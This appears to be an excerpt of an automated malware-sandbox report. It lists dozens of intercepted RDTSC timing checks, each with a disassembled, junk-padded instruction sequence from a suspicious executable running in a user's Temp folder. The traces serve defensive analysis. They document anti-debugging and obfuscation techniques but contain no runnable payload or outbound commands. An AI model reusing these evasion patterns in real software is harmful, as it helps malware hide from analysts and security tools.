Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54407BF second address: 54407CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470152 second address: 5470158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470158 second address: 547015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 547015C second address: 54701EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, si 0x0000000d pushfd 0x0000000e jmp 00007F58F4C28988h 0x00000013 add esi, 39EA7978h 0x00000019 jmp 00007F58F4C2897Bh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 mov si, 10CBh 0x00000026 jmp 00007F58F4C28980h 0x0000002b popad 0x0000002c xchg eax, esi 0x0000002d jmp 00007F58F4C28980h 0x00000032 push eax 0x00000033 jmp 00007F58F4C2897Bh 0x00000038 xchg eax, esi 0x00000039 jmp 00007F58F4C28986h 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov ebx, 3F69D980h 0x00000049 mov ecx, edx 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54701EE second address: 5470243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F53CD390h 0x00000008 mov eax, 50F94061h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 sub ebx, ebx 0x00000012 pushad 0x00000013 mov bh, A1h 0x00000015 pushfd 0x00000016 jmp 00007F58F53CD394h 0x0000001b jmp 00007F58F53CD395h 0x00000020 popfd 0x00000021 popad 0x00000022 test esi, esi 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov cx, 92E9h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470243 second address: 5470284 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 4E8E74A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, cl 0x0000000b popad 0x0000000c je 00007F596750EAB5h 0x00000012 pushad 0x00000013 jmp 00007F58F4C2897Fh 0x00000018 popad 0x00000019 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F58F4C28985h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470284 second address: 5470356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c mov ax, 0163h 0x00000010 popad 0x00000011 je 00007F5967CB3488h 0x00000017 pushad 0x00000018 mov dh, E3h 0x0000001a push esi 0x0000001b pushfd 0x0000001c jmp 00007F58F53CD393h 0x00000021 xor ch, 0000003Eh 0x00000024 jmp 00007F58F53CD399h 0x00000029 popfd 0x0000002a pop ecx 0x0000002b popad 0x0000002c test byte ptr [77DE6968h], 00000002h 0x00000033 jmp 00007F58F53CD397h 0x00000038 jne 00007F5967CB3440h 0x0000003e pushad 0x0000003f jmp 00007F58F53CD394h 0x00000044 call 00007F58F53CD392h 0x00000049 mov ecx, 02359761h 0x0000004e pop esi 0x0000004f popad 0x00000050 mov edx, dword ptr [ebp+0Ch] 0x00000053 pushad 0x00000054 mov eax, edi 0x00000056 mov eax, ebx 0x00000058 popad 0x00000059 push ebp 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F58F53CD398h 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470356 second address: 5470365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470365 second address: 54703AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c jmp 00007F58F53CD38Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov eax, 0FEF4B3Dh 0x00000018 jmp 00007F58F53CD38Ah 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push esi 0x00000023 pop ebx 0x00000024 mov bx, cx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54703AF second address: 54703E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F58F4C2897Bh 0x00000009 xor esi, 105541DEh 0x0000000f jmp 00007F58F4C28989h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54703E0 second address: 54703EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54703EE second address: 54703F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 547043F second address: 5470454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470454 second address: 547045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 547045A second address: 5470483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 mov edi, 6885B6D4h 0x00000015 popad 0x00000016 pop ebx 0x00000017 pushad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470483 second address: 547049E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov ch, bh 0x00000007 popad 0x00000008 mov esp, ebp 0x0000000a jmp 00007F58F4C2897Ah 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 547049E second address: 54704BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54704BB second address: 54704C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54704C1 second address: 54704C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54600A5 second address: 54600C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54600C9 second address: 54600CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54600CF second address: 54600D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54600D3 second address: 54600D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D081D second address: 54D0823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D0823 second address: 54D0828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D0828 second address: 54D083C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, FEABh 0x00000007 mov si, DA87h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D083C second address: 54D0844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D0844 second address: 54D08C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cl, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F58F4C2897Bh 0x00000012 adc eax, 7E7291FEh 0x00000018 jmp 00007F58F4C28989h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F58F4C2897Fh 0x00000029 and ecx, 68D5E40Eh 0x0000002f jmp 00007F58F4C28989h 0x00000034 popfd 0x00000035 call 00007F58F4C28980h 0x0000003a pop ecx 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D08C3 second address: 54D08F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F58F53CD38Eh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F58F53CD38Ch 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov cx, di 0x0000001a mov bx, F52Ch 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D08F2 second address: 54D08F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D08F8 second address: 54D08FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C071D second address: 54C0741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 call 00007F58F4C2897Bh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 mov ebx, 0C572094h 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0741 second address: 54C0788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ch, 5Eh 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F58F53CD396h 0x00000017 adc al, FFFFFFA8h 0x0000001a jmp 00007F58F53CD38Bh 0x0000001f popfd 0x00000020 push ecx 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5460899 second address: 54608A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0C56 second address: 54C0C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0C67 second address: 54C0C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0C78 second address: 54C0CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F58F53CD38Eh 0x00000011 mov ebp, esp 0x00000013 jmp 00007F58F53CD390h 0x00000018 push dword ptr [ebp+0Ch] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0CB9 second address: 54C0CD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0CD6 second address: 54C0D0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F58F53CD398h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0D0A second address: 54C0D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0D10 second address: 54C0D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0D16 second address: 54C0D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC510F second address: CC5118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC5118 second address: CC513C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC513C second address: CC5142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC550A second address: CC5514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC5514 second address: CC5518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: B1337C second address: B12C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D1EC5h], ecx 0x00000010 push dword ptr [ebp+122D0091h] 0x00000016 pushad 0x00000017 mov dword ptr [ebp+122D21D6h], esi 0x0000001d mov eax, dword ptr [ebp+122D2B53h] 0x00000023 popad 0x00000024 call dword ptr [ebp+122D1EFEh] 0x0000002a pushad 0x0000002b mov dword ptr [ebp+122D260Eh], edi 0x00000031 xor eax, eax 0x00000033 stc 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 mov dword ptr [ebp+122D260Eh], eax 0x0000003e mov dword ptr [ebp+122D2DBBh], eax 0x00000044 cmc 0x00000045 mov esi, 0000003Ch 0x0000004a mov dword ptr [ebp+122D260Eh], esi 0x00000050 mov dword ptr [ebp+122D260Eh], esi 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007F58F53CD396h 0x0000005f lodsw 0x00000061 cmc 0x00000062 mov dword ptr [ebp+122D28BBh], ecx 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c jmp 00007F58F53CD397h 0x00000071 jmp 00007F58F53CD398h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a clc 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f je 00007F58F53CD386h 0x00000085 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C91B9F second address: C91BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F58F4C28976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8193F second address: C81962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Eh 0x00000007 jo 00007F58F53CD38Ch 0x0000000d jnc 00007F58F53CD386h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90B27 second address: C90B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F58F4C28976h 0x0000000a jc 00007F58F4C28976h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90B39 second address: C90B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F58F53CD396h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90E45 second address: C90E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F53CD38Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90E55 second address: C90E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007F58F4C28976h 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C913E3 second address: C91401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD395h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C943B3 second address: B12C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xor dword ptr [esp], 28085C14h 0x0000000e mov dword ptr [ebp+1244EC87h], ecx 0x00000014 mov edx, 1DD02C11h 0x00000019 push dword ptr [ebp+122D0091h] 0x0000001f stc 0x00000020 call dword ptr [ebp+122D1EFEh] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D260Eh], edi 0x0000002d xor eax, eax 0x0000002f stc 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 mov dword ptr [ebp+122D260Eh], eax 0x0000003a mov dword ptr [ebp+122D2DBBh], eax 0x00000040 cmc 0x00000041 mov esi, 0000003Ch 0x00000046 mov dword ptr [ebp+122D260Eh], esi 0x0000004c mov dword ptr [ebp+122D260Eh], esi 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 jmp 00007F58F4C28986h 0x0000005b lodsw 0x0000005d cmc 0x0000005e mov dword ptr [ebp+122D28BBh], ecx 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007F58F4C28987h 0x0000006d jmp 00007F58F4C28988h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 clc 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b je 00007F58F4C28976h 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C94499 second address: C944EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F58F53CD38Ah 0x0000000d push edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F58F53CD398h 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 jmp 00007F58F53CD393h 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C944EF second address: C944F9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C944FF second address: C94539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c xor edi, dword ptr [ebp+122D2B63h] 0x00000012 lea ebx, dword ptr [ebp+12455317h] 0x00000018 sub cx, E73Ah 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F58F4C28983h 0x00000025 rdtsc
